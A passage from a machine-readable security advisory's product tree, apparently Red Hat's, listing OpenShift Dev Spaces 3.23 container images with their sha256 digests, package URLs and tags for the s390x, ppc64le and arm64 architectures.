                    "purl": "pkg:oci/code-rhel9@sha256%3A48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e?arch=s390x\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.23-1757618807"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x",
                "product": {
                  "name": "registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x",
                  "product_id": "registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x",
                  "product_identification_helper": {
                    "purl": "pkg:oci/configbump-rhel9@sha256%3A934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182?arch=s390x\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.23-1756506343"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x",
                "product": {
                  "name": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x",
                  "product_id": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x",
                  "product_identification_helper": {
                    "purl": "pkg:oci/dashboard-rhel9@sha256%3A7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749?arch=s390x\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.23-1757019057"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x",
                "product": {
                  "name": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x",
                  "product_id": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x",
                  "product_identification_helper": {
                    "purl": "pkg:oci/imagepuller-rhel9@sha256%3A8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7?arch=s390x\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.23-1756507311"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x",
                "product": {
                  "name": "registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x",
                  "product_id": "registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x",
                  "product_identification_helper": {
                    "purl": "pkg:oci/jetbrains-ide-rhel9@sha256%3Acd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85?arch=s390x\u0026repository_url=registry.redhat.io/devspaces-tech-preview\u0026tag=3.23-1757019334"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x",
                "product": {
                  "name": "registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x",
                  "product_id": "registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x",
                  "product_identification_helper": {
                    "purl": "pkg:oci/machineexec-rhel9@sha256%3Ae32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223?arch=s390x\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.23-1756509551"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x",
                "product": {
                  "name": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x",
                  "product_id": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x",
                  "product_identification_helper": {
                    "purl": "pkg:oci/openvsx-rhel9@sha256%3A1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55?arch=s390x\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.23-1757017659"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x",
                "product": {
                  "name": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x",
                  "product_id": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x",
                  "product_identification_helper": {
                    "purl": "pkg:oci/devspaces-rhel9-operator@sha256%3A59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c?arch=s390x\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.23-1756828766"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x",
                "product": {
                  "name": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x",
                  "product_id": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x",
                  "product_identification_helper": {
                    "purl": "pkg:oci/pluginregistry-rhel9@sha256%3Af2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346?arch=s390x\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.23-1757367052"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x",
                "product": {
                  "name": "registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x",
                  "product_id": "registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x",
                  "product_identification_helper": {
                    "purl": "pkg:oci/server-rhel9@sha256%3A641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3?arch=s390x\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.23-1756753588"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x",
                "product": {
                  "name": "registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x",
                  "product_id": "registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x",
                  "product_identification_helper": {
                    "purl": "pkg:oci/traefik-rhel9@sha256%3A5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b?arch=s390x\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.23-1756504388"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x",
                "product": {
                  "name": "registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x",
                  "product_id": "registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x",
                  "product_identification_helper": {
                    "purl": "pkg:oci/udi-rhel9@sha256%3Aa4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216?arch=s390x\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.23-1757028609"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x",
                "product": {
                  "name": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x",
                  "product_id": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x",
                  "product_identification_helper": {
                    "purl": "pkg:oci/udi-base-rhel9@sha256%3Ab60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569?arch=s390x\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.23-1757037884"
                  }
                }
              }
            ],
            "category": "architecture",
            "name": "s390x"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le",
                "product": {
                  "name": "registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le",
                  "product_id": "registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:oci/code-rhel9@sha256%3A8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.23-1757618807"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le",
                "product": {
                  "name": "registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le",
                  "product_id": "registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:oci/configbump-rhel9@sha256%3A7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.23-1756506343"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le",
                "product": {
                  "name": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le",
                  "product_id": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:oci/dashboard-rhel9@sha256%3A91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.23-1757019057"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le",
                "product": {
                  "name": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le",
                  "product_id": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:oci/imagepuller-rhel9@sha256%3Aad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.23-1756507311"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le",
                "product": {
                  "name": "registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le",
                  "product_id": "registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:oci/jetbrains-ide-rhel9@sha256%3A0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces-tech-preview\u0026tag=3.23-1757019334"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le",
                "product": {
                  "name": "registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le",
                  "product_id": "registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:oci/machineexec-rhel9@sha256%3A13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.23-1756509551"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le",
                "product": {
                  "name": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le",
                  "product_id": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:oci/openvsx-rhel9@sha256%3Ae762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.23-1757017659"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le",
                "product": {
                  "name": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le",
                  "product_id": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:oci/devspaces-rhel9-operator@sha256%3A38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.23-1756828766"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le",
                "product": {
                  "name": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le",
                  "product_id": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:oci/pluginregistry-rhel9@sha256%3A5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.23-1757367052"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le",
                "product": {
                  "name": "registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le",
                  "product_id": "registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:oci/server-rhel9@sha256%3Afa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.23-1756753588"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le",
                "product": {
                  "name": "registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le",
                  "product_id": "registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:oci/traefik-rhel9@sha256%3Aa152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.23-1756504388"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le",
                "product": {
                  "name": "registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le",
                  "product_id": "registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:oci/udi-rhel9@sha256%3Acc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.23-1757028609"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le",
                "product": {
                  "name": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le",
                  "product_id": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:oci/udi-base-rhel9@sha256%3Aee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.23-1757037884"
                  }
                }
              }
            ],
            "category": "architecture",
            "name": "ppc64le"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64",
                "product": {
                  "name": "registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64",
                  "product_id": "registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/code-rhel9@sha256%3A32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f?arch=arm64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.23-1757618807"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64",
                "product": {
                  "name": "registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64",
                  "product_id": "registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/configbump-rhel9@sha256%3A43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05?arch=arm64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.23-1756506343"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64",
                "product": {
                  "name": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64",
                  "product_id": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/dashboard-rhel9@sha256%3A78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda?arch=arm64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.23-1757019057"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64",
                "product": {
                  "name": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64",
                  "product_id": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/imagepuller-rhel9@sha256%3Ac9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078?arch=arm64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.23-1756507311"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64",
                "product": {
                  "name": "registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64",
                  "product_id": "registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/jetbrains-ide-rhel9@sha256%3Ad0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d?arch=arm64\u0026repository_url=registry.redhat.io/devspaces-tech-preview\u0026tag=3.23-1757019334"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64",
                "product": {
                  "name": "registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64",
                  "product_id": "registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/machineexec-rhel9@sha256%3A43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c?arch=arm64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.23-1756509551"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64",
                "product": {
                  "name": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64",
                  "product_id": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/openvsx-rhel9@sha256%3A15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76?arch=arm64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.23-1757017659"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64",
                "product": {
                  "name": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64",
                  "product_id": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/devspaces-rhel9-operator@sha256%3Af5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f?arch=arm64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.23-1756828766"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64",
                "product": {
                  "name": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64",
                  "product_id": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/pluginregistry-rhel9@sha256%3Acc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d?arch=arm64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.23-1757367052"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64",
                "product": {
                  "name": "registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64",
                  "product_id": "registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/server-rhel9@sha256%3A3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c?arch=arm64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.23-1756753588"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64",
                "product": {
                  "name": "registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64",
                  "product_id": "registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64",
                  "product_identification_helper": {
